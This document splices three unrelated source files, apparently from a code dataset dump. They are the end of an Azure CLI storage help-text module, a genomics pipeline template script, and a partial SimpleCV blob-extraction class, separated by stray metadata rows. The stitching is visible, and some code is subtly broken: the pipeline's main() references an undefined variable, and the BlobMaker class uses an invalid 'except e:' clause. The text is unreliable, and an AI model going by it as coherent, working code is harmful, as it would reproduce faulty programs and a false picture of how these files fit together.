long-summary: When you use '*' in --pattern, it will match any character including the the directory separator '/'.
- name: --dryrun
type: bool
short-summary: List the files and blobs to be uploaded. No actual data transfer will occur.
- name: --max-connections
type: integer
short-summary: The maximum number of parallel connections to use. Default value is 1.
- name: --validate-content
type: bool
short-summary: If set, calculates an MD5 hash for each range of the file for validation.
long-summary: >
The storage service checks the hash of the content that has arrived is identical to the hash that was sent.
This is mostly valuable for detecting bitflips during transfer if using HTTP instead of HTTPS. This hash is not stored.
examples:
- name: Upload files from a local directory to an Azure Storage File Share in a batch operation. (autogenerated)
text: |
az storage file upload-batch --account-key 00000000 --account-name MyAccount --destination . --source /path/to/file
crafted: true
"""
helps['storage file url'] = """
type: command
short-summary: Create the url to access a file.
examples:
- name: Create the url to access a file. (autogenerated)
text: |
az storage file url --account-name MyAccount --path path/file.txt --share-name MyShare
crafted: true
"""
helps['storage fs'] = """
type: group
short-summary: Manage file systems in Azure Data Lake Storage Gen2 account.
"""
helps['storage fs access'] = """
type: group
short-summary: Manage file system access and permissions for Azure Data Lake Storage Gen2 account.
"""
helps['storage fs access set'] = """
type: command
short-summary: Set the access control properties of a path(directory or file) in Azure Data Lake Storage Gen2 account.
parameters:
- name: --acl
short-summary: Invalid in conjunction with acl. POSIX access control rights on files and directories in the format "[scope:][type]:[id]:[permissions]". e.g. "user::rwx,group::r--,other::---,mask::rwx".
long-summary: >
The value is a comma-separated list of access control entries. Each access control entry (ACE) consists of a scope,
a type, a user or group identifier, and permissions in the format "[scope:][type]:[id]:[permissions]".
The scope must be "default" to indicate the ACE belongs to the default ACL for a directory;
otherwise scope is implicit and the ACE belongs to the access ACL. There are four ACE types:
"user" grants rights to the owner or a named user, "group" grants rights to the owning group
or a named group, "mask" restricts rights granted to named users and the members of groups,
and "other" grants rights to all users not found in any of the other entries.
The user or group identifier is omitted for entries of type "mask" and "other".
The user or group identifier is also omitted for the owner and owning group.
For example, the following ACL grants read, write, and execute rights to the file owner an
john.doe@contoso, the read right to the owning group, and nothing to everyone else:
"user::rwx,user:john.doe@contoso:rwx,group::r--,other::---,mask::rwx".
For more information, please refer to https://docs.microsoft.com/en-us/azure/storage/blobs/data-lake-storage-access-control.
- name: --permissions
short-summary: >
Invalid in conjunction with acl. POSIX access permissions for the file owner, the file owning group, and others.
Each class may be granted read(r), write(w), or execute(x) permission. Both symbolic (rwxrw-rw-) and 4-digit octal
notation (e.g. 0766) are supported.'
- name: --owner
short-summary: >
The owning user of the file or directory. The user Azure Active Directory object ID or user principal name to
set as the owner. For more information, please refer to
https://docs.microsoft.com/en-us/azure/storage/blobs/data-lake-storage-access-control#the-owning-user.
- name: --group
short-summary: >
The owning group of the file or directory. The group Azure Active Directory object ID or user principal name to
set as the owning group. For more information, please refer to
https://docs.microsoft.com/en-us/azure/storage/blobs/data-lake-storage-access-control#changing-the-owning-group.
examples:
- name: Set the access control list of a path.
text: az storage fs access set --acl "user::rwx,group::r--,other::---" -p dir -f myfilesystem --account-name mystorageaccount --account-key 0000-0000
- name: Set permissions of a path.
text: az storage fs access set --permissions "rwxrwx---" -p dir -f myfilesystem --account-name mystorageaccount --account-key 0000-0000
- name: Set owner of a path.
text: az storage fs access set --owner example@microsoft.com -p dir -f myfilesystem --account-name mystorageaccount --account-key 0000-0000
- name: Set owning group of a path.
text: az storage fs access set --group 68390a19-a897-236b-b453-488abf67b4dc -p dir -f myfilesystem --account-name mystorageaccount --account-key 0000-0000
"""
helps['storage fs access show'] = """
type: command
short-summary: Show the access control properties of a path (directory or file) in Azure Data Lake Storage Gen2 account.
examples:
- name: Show the access control properties of a path.
text: az storage fs access show -p dir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs create'] = """
type: command
short-summary: Create file system for Azure Data Lake Storage Gen2 account.
examples:
- name: Create file system for Azure Data Lake Storage Gen2 account.
text: |
az storage fs create -n fsname --account-name mystorageaccount --account-key 0000-0000
- name: Create file system for Azure Data Lake Storage Gen2 account and enable public access.
text: |
az storage fs create -n fsname --public-access file --account-name mystorageaccount --account-key 0000-0000
"""
helps['storage fs delete'] = """
type: command
short-summary: Delete a file system in ADLS Gen2 account.
examples:
- name: Delete a file system in ADLS Gen2 account.
text: az storage fs delete -n myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs exists'] = """
type: command
short-summary: Check for the existence of a file system in ADLS Gen2 account.
examples:
- name: Check for the existence of a file system in ADLS Gen2 account.
text: az storage fs exists -n myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs list'] = """
type: command
short-summary: List file systems in ADLS Gen2 account.
examples:
- name: List file systems in ADLS Gen2 account.
text: az storage fs list --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs show'] = """
type: command
short-summary: Show properties of file system in ADLS Gen2 account.
examples:
- name: Show properties of file system in ADLS Gen2 account.
text: az storage fs show -n myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs directory'] = """
type: group
short-summary: Manage directories in Azure Data Lake Storage Gen2 account.
"""
helps['storage fs directory create'] = """
type: command
short-summary: Create a directory in ADLS Gen2 file system.
examples:
- name: Create a directory in ADLS Gen2 file system.
text: az storage fs directory create -n dir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
- name: Create a directory in ADLS Gen2 file system through connection string.
text: az storage fs directory create -n dir -f myfilesystem --connection-string myconnectionstring
"""
helps['storage fs directory delete'] = """
type: command
short-summary: Delete a directory in ADLS Gen2 file system.
examples:
- name: Delete a directory in ADLS Gen2 file system.
text: az storage fs directory delete -n dir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs directory exists'] = """
type: command
short-summary: Check for the existence of a directory in ADLS Gen2 file system.
examples:
- name: Check for the existence of a directory in ADLS Gen2 file system.
text: az storage fs directory exists -n dir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs directory list'] = """
type: command
short-summary: List directories in ADLS Gen2 file system.
examples:
- name: List directories in ADLS Gen2 file system.
text: az storage fs directory list -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
- name: List directories in "dir/" for ADLS Gen2 file system.
text: az storage fs directory list --path dir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs directory metadata'] = """
type: group
short-summary: Manage the metadata for directory in file system.
"""
helps['storage fs directory metadata show'] = """
type: command
short-summary: Return all user-defined metadata for the specified directory.
examples:
- name: Return all user-defined metadata for the specified directory.
text: az storage fs directory metadata show -n dir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs directory move'] = """
type: command
short-summary: Move a directory in ADLS Gen2 file system.
examples:
- name: Move a directory a directory in ADLS Gen2 file system.
text: az storage fs directory move --new-directory newfs/dir -n dir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs directory show'] = """
type: command
short-summary: Show properties of a directory in ADLS Gen2 file system.
examples:
- name: Show properties of a directory in ADLS Gen2 file system.
text: az storage fs directory show -n dir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
- name: Show properties of a subdirectory in ADLS Gen2 file system.
text: az storage fs directory show -n dir/subdir -f myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file'] = """
type: group
short-summary: Manage files in Azure Data Lake Storage Gen2 account.
"""
helps['storage fs file append'] = """
type: command
short-summary: Append content to a file in ADLS Gen2 file system.
examples:
- name: Append content to a file in ADLS Gen2 file system.
text: |
az storage fs file append --content "test content test" -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file create'] = """
type: command
short-summary: Create a new file in ADLS Gen2 file system.
examples:
- name: Create a new file in ADLS Gen2 file system.
text: |
az storage fs file create -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file delete'] = """
type: command
short-summary: Delete a file in ADLS Gen2 file system.
examples:
- name: Delete a file in ADLS Gen2 file system.
text: |
az storage fs file delete -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file download'] = """
type: command
short-summary: Download a file from the specified path in ADLS Gen2 file system.
examples:
- name: Download a file in ADLS Gen2 file system to current path.
text: |
az storage fs file download -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
- name: Download a file in ADLS Gen2 file system to a specified directory.
text: |
az storage fs file download -p dir/a.txt -d test/ -f fsname --account-name myadlsaccount --account-key 0000-0000
- name: Download a file in ADLS Gen2 file system to a specified file path.
text: |
az storage fs file download -p dir/a.txt -d test/b.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file exists'] = """
type: command
short-summary: Check for the existence of a file in ADLS Gen2 file system.
examples:
- name: Check for the existence of a file in ADLS Gen2 file system.
text: |
az storage fs file exists -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file list'] = """
type: command
short-summary: List files and directories in ADLS Gen2 file system.
examples:
- name: List files and directories in ADLS Gen2 file system.
text: |
az storage fs file list -f fsname --account-name myadlsaccount --account-key 0000-0000
- name: List files in ADLS Gen2 file system.
text: |
az storage fs file list --exclude-dir -f fsname --account-name myadlsaccount --account-key 0000-0000
- name: List files and directories in a specified path.
text: |
az storage fs file list --path dir -f fsname --account-name myadlsaccount --account-key 0000-0000
- name: List files and directories from a specific marker.
text: |
az storage fs file list --marker "VBaS6LvPufaqrTANTQvbmV3dHJ5FgAAAA==" -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file metadata'] = """
type: group
short-summary: Manage the metadata for file in file system.
"""
helps['storage fs metadata show'] = """
type: command
short-summary: Return all user-defined metadata for the specified file.
examples:
- name: Return all user-defined metadata for the specified file.
text: az storage fs file metadata show -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file move'] = """
type: command
short-summary: Move a file in ADLS Gen2 Account.
examples:
- name: Move a file in ADLS Gen2 Account.
text: |
az storage fs file move --new-path new-fs/new-dir/b.txt -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file show'] = """
type: command
short-summary: Show properties of file in ADLS Gen2 file system.
examples:
- name: Show properties of file in ADLS Gen2 file system.
text: |
az storage fs file show -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs file upload'] = """
type: command
short-summary: Upload a file to a file path in ADLS Gen2 file system.
examples:
- name: Upload a file from local path to a file path in ADLS Gen2 file system.
text: |
az storage fs file upload --source a.txt -p dir/a.txt -f fsname --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage fs metadata'] = """
type: group
short-summary: Manage the metadata for file system.
"""
helps['storage fs metadata show'] = """
type: command
short-summary: Return all user-defined metadata for the specified file system.
examples:
- name: Return all user-defined metadata for the specified file system.
text: az storage fs metadata show -n myfilesystem --account-name myadlsaccount --account-key 0000-0000
"""
helps['storage logging'] = """
type: group
short-summary: Manage storage service logging information.
"""
helps['storage logging off'] = """
type: command
short-summary: Turn off logging for a storage account.
parameters:
- name: --services
short-summary: 'The storage services from which to retrieve logging info: (b)lob (q)ueue (t)able. Can be combined.'
examples:
- name: Turn off logging for a storage account.
text: |
az storage logging off --account-name MyAccount
"""
helps['storage logging show'] = """
type: command
short-summary: Show logging settings for a storage account.
parameters:
- name: --services
short-summary: 'The storage services from which to retrieve logging info: (b)lob (q)ueue (t)able. Can be combined.'
examples:
- name: Show logging settings for a storage account. (autogenerated)
text: |
az storage logging show --account-name MyAccount --services qt
crafted: true
"""
helps['storage logging update'] = """
type: command
short-summary: Update logging settings for a storage account.
parameters:
- name: --services
short-summary: 'The storage service(s) for which to update logging info: (b)lob (q)ueue (t)able. Can be combined.'
- name: --log
short-summary: 'The operations for which to enable logging: (r)ead (w)rite (d)elete. Can be combined.'
- name: --retention
short-summary: Number of days for which to retain logs. 0 to disable.
- name: --version
short-summary: Version of the logging schema.
"""
helps['storage message'] = """
type: group
short-summary: Manage queue storage messages.
long-summary: >
Please specify one of the following authentication parameters for your commands: --auth-mode, --account-key,
--connection-string, --sas-token. You also can use corresponding environment variables to store your authentication
credentials, e.g. AZURE_STORAGE_KEY, AZURE_STORAGE_CONNECTION_STRING and AZURE_STORAGE_SAS_TOKEN.
"""
helps['storage metrics'] = """
type: group
short-summary: Manage storage service metrics.
"""
helps['storage metrics show'] = """
type: command
short-summary: Show metrics settings for a storage account.
parameters:
- name: --services
short-summary: 'The storage services from which to retrieve metrics info: (b)lob (q)ueue (t)able. Can be combined.'
- name: --interval
short-summary: Filter the set of metrics to retrieve by time interval
examples:
- name: Show metrics settings for a storage account. (autogenerated)
text: |
az storage metrics show --account-key 00000000 --account-name MyAccount
crafted: true
"""
helps['storage metrics update'] = """
type: command
short-summary: Update metrics settings for a storage account.
parameters:
- name: --services
short-summary: 'The storage services from which to retrieve metrics info: (b)lob (q)ueue (t)able. Can be combined.'
- name: --hour
short-summary: Update the hourly metrics
- name: --minute
short-summary: Update the by-minute metrics
- name: --api
short-summary: Specify whether to include API in metrics. Applies to both hour and minute metrics if both are specified. Must be specified if hour or minute metrics are enabled and being updated.
- name: --retention
short-summary: Number of days for which to retain metrics. 0 to disable. Applies to both hour and minute metrics if both are specified.
examples:
- name: Update metrics settings for a storage account. (autogenerated)
text: |
az storage metrics update --account-name MyAccount --api true --hour true --minute true --retention 10 --services bfqt
crafted: true
- name: Update metrics settings for a storage account. (autogenerated)
text: |
az storage metrics update --api true --connection-string $connectionString --hour true --minute true --retention 10 --services bfqt
crafted: true
"""
helps['storage queue'] = """
type: group
short-summary: Manage storage queues.
"""
helps['storage queue list'] = """
type: command
short-summary: List queues in a storage account.
"""
helps['storage queue metadata'] = """
type: group
short-summary: Manage the metadata for a storage queue.
"""
helps['storage queue policy'] = """
type: group
short-summary: Manage shared access policies for a storage queue.
"""
helps['storage remove'] = """
type: command
short-summary: Delete blobs or files from Azure Storage.
examples:
- name: Remove a single blob.
text: az storage remove -c MyContainer -n MyBlob
- name: Remove an entire virtual directory.
text: az storage remove -c MyContainer -n path/to/directory --recursive
- name: Remove only the top blobs inside a virtual directory but not its sub-directories.
text: az storage remove -c MyContainer --recursive
- name: Remove all the blobs in a Storage Container.
text: az storage remove -c MyContainer -n path/to/directory
- name: Remove a subset of blobs in a virtual directory (For example, only jpg and pdf files, or if the blob name is "exactName" and file names don't start with "test").
text: az storage remove -c MyContainer --include-path path/to/directory --include-pattern "*.jpg;*.pdf;exactName" --exclude-pattern "test*" --recursive
- name: Remove an entire virtual directory but exclude certain blobs from the scope (For example, every blob that starts with foo or ends with bar).
text: az storage remove -c MyContainer --include-path path/to/directory --exclude-pattern "foo*;*bar" --recursive
- name: Remove a single file.
text: az storage remove -s MyShare -p MyFile
- name: Remove an entire directory.
text: az storage remove -s MyShare -p path/to/directory --recursive
- name: Remove all the files in a Storage File Share.
text: az storage remove -s MyShare --recursive
"""
helps['storage share-rm'] = """
type: group
short-summary: Manage Azure file shares using the Microsoft.Storage resource provider.
"""
helps['storage share-rm create'] = """
type: command
short-summary: Create a new Azure file share under the specified storage account.
examples:
- name: Create a new Azure file share 'myfileshare' with metadata and quota as 10 GB under the storage account 'mystorageaccount'(account name) in resource group 'MyResourceGroup'.
text: az storage share-rm create -g MyResourceGroup --storage-account mystorageaccount --name myfileshare --quota 10 --metadata key1=value1 key2=value2
- name: Create a new Azure file share 'myfileshare' with metadata and quota as 6000 GB under the storage account 'mystorageaccount'(account name) which enables large file share in resource group 'MyResourceGroup'.
text: |
az storage account update -g MyResourceGroup --name mystorageaccount --enable-large-file-share
az storage share-rm create -g MyResourceGroup --storage-account mystorageaccount --name myfileshare --quota 6000 --metadata key1=value1 key2=value2
- name: Create a new Azure file share 'myfileshare' with metadata and quota as 10 GB under the storage account 'mystorageaccount' (account id).
text: az storage share-rm create --storage-account mystorageaccount --name myfileshare --quota 10 --metadata key1=value1 key2=value2
"""
helps['storage share-rm delete'] = """
type: command
short-summary: Delete the specified Azure file share.
examples:
- name: Delete an Azure file share 'myfileshare' under the storage account 'mystorageaccount' (account name) in resource group 'MyResourceGroup'.
text: az storage share-rm delete -g MyResourceGroup --storage-account mystorageaccount --name myfileshare
- name: Delete an Azure file share 'myfileshare' under the storage account 'mystorageaccount' (account id).
text: az storage share-rm delete --storage-account mystorageaccount --name myfileshare
- name: Delete an Azure file share by resource id.
text: az storage share-rm delete --ids file-share-id
"""
helps['storage share-rm exists'] = """
type: command
short-summary: Check for the existence of an Azure file share.
examples:
- name: Check for the existence of an Azure file share 'myfileshare' under the storage account 'mystorageaccount' (account name) in resource group 'MyResourceGroup'.
text: az storage share-rm exists -g MyResourceGroup --storage-account mystorageaccount --name myfileshare
- name: Check for the existence of an Azure file share 'myfileshare' under the storage account 'mystorageaccount' (account id).
text: az storage share-rm exists --storage-account mystorageaccount --name myfileshare
- name: Check for the existence of an Azure file share by resource id.
text: az storage share-rm exists --ids file-share-id
"""
helps['storage share-rm list'] = """
type: command
short-summary: List the Azure file shares under the specified storage account.
examples:
- name: List the Azure file shares under the storage account 'mystorageaccount' (account name) in resource group 'MyResourceGroup'.
text: az storage share-rm list -g MyResourceGroup --storage-account mystorageaccount
- name: List the Azure file shares under the storage account 'mystorageaccount' (account id).
text: az storage share-rm list --storage-account mystorageaccount
"""
helps['storage share-rm show'] = """
type: command
short-summary: Show the properties for a specified Azure file share.
examples:
- name: Show the properties for an Azure file share 'myfileshare' under the storage account 'mystorageaccount' (account name) in resource group 'MyResourceGroup'.
text: az storage share-rm show -g MyResourceGroup --storage-account mystorageaccount --name myfileshare
- name: Show the properties for an Azure file share 'myfileshare' under the storage account 'mystorageaccount' (account id).
text: az storage share-rm show --storage-account mystorageaccount --name myfileshare
- name: Show the properties of an Azure file shares by resource id.
text: az storage share-rm show --ids file-share-id
"""
helps['storage share-rm update'] = """
type: command
short-summary: Update the properties for an Azure file share.
examples:
- name: Update the properties for an Azure file share 'myfileshare' under the storage account 'mystorageaccount' (account name) in resource group 'MyResourceGroup'.
text: az storage share-rm update -g MyResourceGroup --storage-account mystorageaccount --name myfileshare --quota 3 --metadata key1=value1 key2=value2
- name: Update the properties for an Azure file share 'myfileshare' under the storage account 'mystorageaccount' (account id).
text: az storage share-rm update --storage-account mystorageaccount --name myfileshare --quota 3 --metadata key1=value1 key2=value2
- name: Update the properties for an Azure file shares by resource id.
text: az storage share-rm update --ids file-share-id --quota 3 --metadata key1=value1 key2=value2
"""
helps['storage share'] = """
type: group
short-summary: Manage file shares.
"""
helps['storage share create'] = """
type: command
short-summary: Creates a new share under the specified account.
examples:
- name: Creates a new share under the specified account. (autogenerated)
text: |
az storage share create --account-name MyAccount --name MyFileShare
crafted: true
"""
helps['storage share exists'] = """
type: command
short-summary: Check for the existence of a file share.
examples:
- name: Check for the existence of a file share. (autogenerated)
text: |
az storage share exists --account-key 00000000 --account-name MyAccount --name MyFileShare
crafted: true
- name: Check for the existence of a file share (autogenerated)
text: |
az storage share exists --connection-string $connectionString --name MyFileShare
crafted: true
"""
helps['storage share generate-sas'] = """
type: command
examples:
- name: Generate a sas token for a fileshare and use it to upload a file.
text: |
end=`date -u -d "30 minutes" '+%Y-%m-%dT%H:%MZ'`
sas=`az storage share generate-sas -n MyShare --account-name MyStorageAccount --https-only --permissions dlrw --expiry $end -o tsv`
az storage file upload -s MyShare --account-name MyStorageAccount --source file.txt --sas-token $sas
- name: Generate a shared access signature for the share. (autogenerated)
text: |
az storage share generate-sas --account-key 00000000 --account-name MyStorageAccount --expiry 2037-12-31T23:59:00Z --name MyShare --permissions dlrw
crafted: true
- name: Generate a shared access signature for the share. (autogenerated)
text: |
az storage share generate-sas --connection-string $connectionString --expiry 2019-02-01T12:20Z --name MyShare --permissions dlrw
crafted: true
"""
helps['storage share list'] = """
type: command
short-summary: List the file shares in a storage account.
"""
helps['storage share metadata'] = """
type: group
short-summary: Manage the metadata of a file share.
"""
helps['storage share policy'] = """
type: group
short-summary: Manage shared access policies of a storage file share.
"""
helps['storage share url'] = """
type: command
short-summary: Create a URI to access a file share.
examples:
- name: Create a URI to access a file share. (autogenerated)
text: |
az storage share url --account-key 00000000 --account-name MyAccount --name MyFileShare
crafted: true
"""
helps['storage table'] = """
type: group
short-summary: Manage NoSQL key-value storage.
"""
helps['storage table list'] = """
type: command
short-summary: List tables in a storage account.
"""
helps['storage table policy'] = """
type: group
short-summary: Manage shared access policies of a storage table.
"""
helps['storage queue'] = """
type: group
short-summary: Manage shared access policies of a storage table.
long-summary: >
Please specify one of the following authentication parameters for your commands: --auth-mode, --account-key,
--connection-string, --sas-token. You also can use corresponding environment variables to store your authentication
credentials, e.g. AZURE_STORAGE_KEY, AZURE_STORAGE_CONNECTION_STRING and AZURE_STORAGE_SAS_TOKEN.
"""
| 50.483078 | 417 | 0.734306 |
e2a0387552e4669637861a8103e4af53e322bd8e | 5,145 | py | Python | pipeline_template_new.py | linlabcode/pipeline | 396ff17a67c9323024b9448665529142b6aa18be | [
"MIT"
] | 3 | 2017-10-05T10:04:48.000Z | 2018-11-15T17:19:58.000Z | pipeline_template_new.py | linlabcode/pipeline | 396ff17a67c9323024b9448665529142b6aa18be | [
"MIT"
] | 2 | 2017-02-14T14:33:55.000Z | 2018-12-27T11:30:51.000Z | pipeline_template_new.py | linlabcode/pipeline | 396ff17a67c9323024b9448665529142b6aa18be | [
"MIT"
] | 10 | 2016-09-07T18:02:30.000Z | 2019-02-28T00:11:24.000Z | #!/usr/bin/python
'''
The MIT License (MIT)
Copyright (c) 2018 Charles Lin
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
#Main method run script for processing of slam seq analysis from Muhar et al., 2018
#==========================================================================
#=============================DEPENDENCIES=================================
#==========================================================================
import sys, os
# Get the script's full local path
whereAmI = os.path.dirname(os.path.realpath(__file__))
pipeline_dir = '/storage/cylin/bin/pipeline/'
sys.path.append(whereAmI)
sys.path.append(pipeline_dir)
import pipeline_dfci
import utils
import string
import numpy
import os
import re
from collections import defaultdict
import subprocess
#==========================================================================
#============================PARAMETERS====================================
#==========================================================================
projectName = 'slam_seq'
genome ='hg38'
annotFile = '%s/annotation/%s_refseq.ucsc' % (pipeline_dir,genome)
#project folders
projectFolder = '/storage/cylin/grail/projects/%s' % (projectName) #PATH TO YOUR PROJECT FOLDER
projectFolder = utils.formatFolder(projectFolder,True)
#standard folder names
gffFolder ='%sgff/' % (projectFolder)
macsFolder = '%smacsFolder/' % (projectFolder)
macsEnrichedFolder = '%smacsEnriched/' % (projectFolder)
mappedEnrichedFolder = '%smappedEnriched/' % (projectFolder)
mappedFolder = '%smappedFolder/' % (projectFolder)
wiggleFolder = '%swiggles/' % (projectFolder)
metaFolder = '%smeta/' % (projectFolder)
metaRoseFolder = '%smeta_rose/' % (projectFolder)
roseFolder = '%srose/' % (projectFolder)
fastaFolder = '%sfasta/' % (projectFolder)
bedFolder = '%sbed/' % (projectFolder)
figuresFolder = '%sfigures/' % (projectFolder)
geneListFolder = '%sgeneListFolder/' % (projectFolder)
bedFolder = '%sbeds/' % (projectFolder)
signalFolder = '%ssignalTables/' % (projectFolder)
tableFolder = '%stables/' % (projectFolder)
#mask Files
#genomeDirectory #select your genome
#genomeDirectory = '/grail/genomes/Mus_musculus/UCSC/mm9/Sequence/Chromosomes/'
#genomeDirectory = '/grail/genomes/Mus_musculus/UCSC/hg19/Sequence/Chromosomes/'
#making folders
folderList = [gffFolder,macsFolder,macsEnrichedFolder,mappedEnrichedFolder,mappedFolder,wiggleFolder,metaFolder,metaRoseFolder,roseFolder,fastaFolder,figuresFolder,geneListFolder,bedFolder,signalFolder,tableFolder]
for folder in folderList:
pipeline_dfci.formatFolder(folder,True)
#==========================================================================
#============================LIST OF DATAFILES=============================
#==========================================================================
#this project will utilize multiple datatables
#data tables are organized largely by type/system
#some data tables overlap for ease of analysis
#ChIP-Seq
chip_data_file = '%sdata_tables/HG38_K562_DATA_TABLE.txt' % (projectFolder)
#==========================================================================
#===========================MAIN METHOD====================================
#==========================================================================
def main():
print('main analysis for project %s' % (projectName))
print('changing directory to project folder')
os.chdir(projectFolder)
print('\n\n')
print('#======================================================================')
print('#======================I. LOADING DATA ANNOTATION======================')
print('#======================================================================')
print('\n\n')
#This section sanity checks each data table and makes sure both bam and .bai files are accessible
#for data file
pipeline_dfci.summary(data_file)
#==========================================================================
#==================================THE END=================================
#==========================================================================
if __name__=="__main__":
main()
| 33.627451 | 214 | 0.577065 |
fbc2e525c1c5a58efcff08c48f1071f63a34f477 | 12,299 | py | Python | SimpleCV/Features/BlobMaker.py | ingenuitas/SimpleCV | f9ed8ba40a36423f9beac6931590297a8bb5b064 | [
"BSD-3-Clause"
] | 14 | 2015-02-10T13:07:27.000Z | 2021-02-10T16:26:48.000Z | SimpleCV/Features/BlobMaker.py | hav3n/SimpleCV | a9bb3fc2eb7b47d2ae106c2e8efc28b61eb497c1 | [
"BSD-3-Clause"
] | null | null | null | SimpleCV/Features/BlobMaker.py | hav3n/SimpleCV | a9bb3fc2eb7b47d2ae106c2e8efc28b61eb497c1 | [
"BSD-3-Clause"
] | 16 | 2015-02-23T21:18:28.000Z | 2019-04-17T11:10:28.000Z | from SimpleCV.base import *
#import cv2 as cv2
class BlobMaker:
"""
Blob maker encapsulates all of the contour extraction process and data, so
it can be used inside the image class, or extended and used outside the image
class. The general idea is that the blob maker provides the utilites that one
would use for blob extraction. Later implementations may include tracking and
other features.
"""
mMemStorage = None
def __init__(self):
self.mMemStorage = cv.CreateMemStorage()
return None
def extractUsingModel(self, img, colormodel,minsize=10, maxsize=0):
"""
Extract blobs using a color model
img - The input image
colormodel - The color model to use.
minsize - The minimum size of the returned features.
maxsize - The maximum size of the returned features 0=uses the default value.
Parameters:
img - Image
colormodel - ColorModel object
minsize - Int
maxsize - Int
"""
if (maxsize <= 0):
maxsize = img.width * img.height
gray = colormodel.threshold(img)
blobs = self.extractFromBinary(gray,img,minArea=minsize,maxArea=maxsize)
retVal = sorted(blobs,key=lambda x: x.mArea, reverse=True)
return FeatureSet(retVal)
def extract(self, img, threshval = 127, minsize=10, maxsize=0, threshblocksize=3, threshconstant=5):
"""
This method performs a threshold operation on the input image and then
extracts and returns the blobs.
img - The input image (color or b&w)
threshval - The threshold value for the binarize operation. If threshval = -1 adaptive thresholding is used
minsize - The minimum blob size in pixels.
maxsize - The maximum blob size in pixels. 0=uses the default value.
threshblocksize - The adaptive threhold block size.
threshconstant - The minimum to subtract off the adaptive threshold
"""
if (maxsize <= 0):
maxsize = img.width * img.height
#create a single channel image, thresholded to parameters
blobs = self.extractFromBinary(img.binarize(threshval, 255, threshblocksize, threshconstant).invert(),img,minsize,maxsize)
retVal = sorted(blobs,key=lambda x: x.mArea, reverse=True)
return FeatureSet(retVal)
def extractFromBinary(self,binaryImg,colorImg, minsize = 5, maxsize = -1,appx_level=3):
"""
This method performs blob extraction given a binary source image that is used
to get the blob images, and a color source image.
binarymg- The binary image with the blobs.
colorImg - The color image.
minSize - The minimum size of the blobs in pixels.
maxSize - The maximum blob size in pixels.
* *appx_level* - The blob approximation level - an integer for the maximum distance between the true edge and the approximation edge - lower numbers yield better approximation.
"""
#If you hit this recursion limit may god have mercy on your soul.
#If you really are having problems set the value higher, but this means
# you have over 10,000,000 blobs in your image.
sys.setrecursionlimit(5000)
#h_next moves to the next external contour
#v_next() moves to the next internal contour
if (maxsize <= 0):
maxsize = colorImg.width * colorImg.height
retVal = []
test = binaryImg.meanColor()
if( test[0]==0.00 and test[1]==0.00 and test[2]==0.00):
return FeatureSet(retVal)
# There are a couple of weird corner cases with the opencv
# connect components libraries - when you try to find contours
# in an all black image, or an image with a single white pixel
# that sits on the edge of an image the whole thing explodes
# this check catches those bugs. -KAS
# Also I am submitting a bug report to Willow Garage - please bare with us.
ptest = (4*255.0)/(binaryImg.width*binaryImg.height) # val if two pixels are white
if( test[0]<=ptest and test[1]<=ptest and test[2]<=ptest):
return retVal
seq = cv.FindContours( binaryImg._getGrayscaleBitmap(), self.mMemStorage, cv.CV_RETR_TREE, cv.CV_CHAIN_APPROX_SIMPLE)
try:
# note to self
# http://code.activestate.com/recipes/474088-tail-call-optimization-decorator/
retVal = self._extractFromBinary(seq,False,colorImg,minsize,maxsize,appx_level)
except RuntimeError,e:
logger.warning("You exceeded the recursion limit. This means you probably have too many blobs in your image. We suggest you do some morphological operations (erode/dilate) to reduce the number of blobs in your image. This function was designed to max out at about 5000 blobs per image.")
except e:
logger.warning("SimpleCV Find Blobs Failed - This could be an OpenCV python binding issue")
del seq
return FeatureSet(retVal)
def _extractFromBinary(self, seq, isaHole, colorImg,minsize,maxsize,appx_level):
"""
The recursive entry point for the blob extraction. The blobs and holes are presented
as a tree and we traverse up and across the tree.
"""
retVal = []
if( seq is None ):
return retVal
nextLayerDown = []
while True:
